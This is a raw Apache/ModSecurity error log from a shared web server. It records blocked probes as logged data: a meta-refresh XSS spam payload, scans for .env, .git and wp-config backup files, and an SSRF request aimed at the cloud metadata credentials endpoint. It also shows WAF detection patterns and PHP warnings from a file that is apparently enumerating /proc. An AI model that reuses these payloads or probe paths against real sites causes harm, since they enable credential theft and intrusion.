[Tue May 12 02:19:37.374825 2026] [security2:error] [pid 1709071:tid 1709102] [client 27.78.84.116:49653] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyGbvMumyrWMfSu7qitgAAAM8"]
[Tue May 12 02:19:37.376226 2026] [security2:error] [pid 1709071:tid 1709102] [client 27.78.84.116:49653] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyGbvMumyrWMfSu7qitgAAAM8"]
[Tue May 12 02:19:37.380035 2026] [security2:error] [pid 1709071:tid 1709102] [client 27.78.84.116:49653] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyGbvMumyrWMfSu7qitgAAAM8"]
PHP Warning:  filesize(): stat failed for /proc/1704850/task/1704850/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704850/task/1704850/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704850/task/1704850/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704850/task/1704850/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704850/task/1704850/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704850/task/1704850/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 02:20:20.076809 2026] [security2:error] [pid 1730207:tid 1730231] [client 43.165.7.132:53200] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-mobilite-regional.com"] [uri "/"] [unique_id "agJyRDue9Sp-pIv_Bb6J2QAAAVY"]
[Tue May 12 02:20:22.689530 2026] [security2:error] [pid 1709071:tid 1709107] [client 43.165.7.132:58018] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJyRrvMumyrWMfSu7qi1wAAANQ"], referer: http://pole-mobilite-regional.com
[Tue May 12 02:20:26.202678 2026] [security2:error] [pid 1730175:tid 1730189] [client 43.165.7.132:36364] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJySno6NvB9WXx5V-50PAAAAQw"], referer: https://www.pole-de-mobilite-regional.com/
[Tue May 12 02:21:30.415931 2026] [security2:error] [pid 1709071:tid 1709091] [client 43.159.145.149:48332] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/vous-etes-un-salarie/emploi-sur-notre-territoire/attachment/4/"] [unique_id "agJyirvMumyrWMfSu7qi-gAAAMQ"]
[Tue May 12 02:21:34.627230 2026] [security2:error] [pid 1707624:tid 1707694] [client 43.159.145.149:54024] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-content/uploads/2023/01/4.jpg"] [unique_id "agJyjrOxS7i6i_mT2NLC_gAAAEw"], referer: https://pole-de-mobilite-regional.com/vous-etes-un-salarie/emploi-sur-notre-territoire/attachment/4/
[Tue May 12 02:22:02.560831 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxparent.happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agJyqlfdQaraX_prmqcY4AAAAA0"]
[Tue May 12 02:22:02.560930 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxparent.happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agJyqlfdQaraX_prmqcY4AAAAA0"]
[Tue May 12 02:22:02.561095 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxparent.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJyqlfdQaraX_prmqcY4AAAAA0"]
[Tue May 12 02:22:07.313173 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxparent.happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agJyr1fdQaraX_prmqcZAQAAAA0"]
[Tue May 12 02:22:07.313341 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxparent.happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agJyr1fdQaraX_prmqcZAQAAAA0"]
[Tue May 12 02:22:07.313540 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxparent.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJyr1fdQaraX_prmqcZAQAAAA0"]
[Tue May 12 02:22:14.192103 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxparent.happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agJytlfdQaraX_prmqcZNQAAAA0"]
[Tue May 12 02:22:14.192272 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxparent.happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agJytlfdQaraX_prmqcZNQAAAA0"]
[Tue May 12 02:22:14.192524 2026] [security2:error] [pid 1691274:tid 1691290] [client 20.220.233.65:30178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxparent.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJytlfdQaraX_prmqcZNQAAAA0"]
[Tue May 12 02:22:27.662114 2026] [security2:error] [pid 1709071:tid 1709106] [client 3.89.155.66:49153] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/composer.json"] [unique_id "agJyw7vMumyrWMfSu7qjIAAAANM"]
[Tue May 12 02:22:27.662616 2026] [security2:error] [pid 1709071:tid 1709106] [client 3.89.155.66:49153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/composer.json"] [unique_id "agJyw7vMumyrWMfSu7qjIAAAANM"]
[Tue May 12 02:22:27.662891 2026] [security2:error] [pid 1695975:tid 1696002] [client 3.89.155.66:49152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agJyw9VI9ymHBxup74-HQgAAAJg"]
[Tue May 12 02:22:27.663469 2026] [security2:error] [pid 1695975:tid 1696002] [client 3.89.155.66:49152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agJyw9VI9ymHBxup74-HQgAAAJg"]
[Tue May 12 02:22:28.193345 2026] [security2:error] [pid 1709071:tid 1709106] [client 3.89.155.66:49153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agJyw7vMumyrWMfSu7qjIAAAANM"]
[Tue May 12 02:22:28.224829 2026] [security2:error] [pid 1695975:tid 1696002] [client 3.89.155.66:49152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agJyw9VI9ymHBxup74-HQgAAAJg"]
[Tue May 12 02:22:29.293395 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.244:57054] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.gitignore"] [unique_id "agJyxTue9Sp-pIv_Bb6KIAAAAUA"]
[Tue May 12 02:22:29.293410 2026] [security2:error] [pid 1709071:tid 1709110] [client 45.148.10.244:57198] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.git/logs/HEAD"] [unique_id "agJyxbvMumyrWMfSu7qjIQAAANc"]
[Tue May 12 02:22:29.293480 2026] [security2:error] [pid 1691274:tid 1691298] [client 45.148.10.244:57224] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.production"] [unique_id "agJyxVfdQaraX_prmqcZagAAABc"]
[Tue May 12 02:22:29.293580 2026] [security2:error] [pid 1709071:tid 1709110] [client 45.148.10.244:57198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.git/logs/HEAD"] [unique_id "agJyxbvMumyrWMfSu7qjIQAAANc"]
[Tue May 12 02:22:29.293585 2026] [security2:error] [pid 1730207:tid 1730209] [client 45.148.10.244:57054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.gitignore"] [unique_id "agJyxTue9Sp-pIv_Bb6KIAAAAUA"]
[Tue May 12 02:22:29.293603 2026] [security2:error] [pid 1691274:tid 1691298] [client 45.148.10.244:57224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.production"] [unique_id "agJyxVfdQaraX_prmqcZagAAABc"]
[Tue May 12 02:22:29.294885 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.244:57068] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.krakoukas.com"] [uri "/_next/image"] [unique_id "agJyxTue9Sp-pIv_Bb6KIQAAAU8"]
[Tue May 12 02:22:29.295071 2026] [security2:error] [pid 1695975:tid 1695996] [client 45.148.10.244:57182] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.git/index"] [unique_id "agJyxdVI9ymHBxup74-HRAAAAJI"]
[Tue May 12 02:22:29.295190 2026] [security2:error] [pid 1695975:tid 1695996] [client 45.148.10.244:57182] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.git/index"] [unique_id "agJyxdVI9ymHBxup74-HRAAAAJI"]
[Tue May 12 02:22:29.295629 2026] [security2:error] [pid 1707624:tid 1707693] [client 45.148.10.244:57220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.krakoukas.com"] [uri "/.env.save"] [unique_id "agJyxbOxS7i6i_mT2NLDKgAAAEs"]
[Tue May 12 02:22:29.295677 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.244:57068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/_next/image"] [unique_id "agJyxTue9Sp-pIv_Bb6KIQAAAU8"]
[Tue May 12 02:22:29.295760 2026] [security2:error] [pid 1707624:tid 1707693] [client 45.148.10.244:57220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.krakoukas.com"] [uri "/.env.save"] [unique_id "agJyxbOxS7i6i_mT2NLDKgAAAEs"]
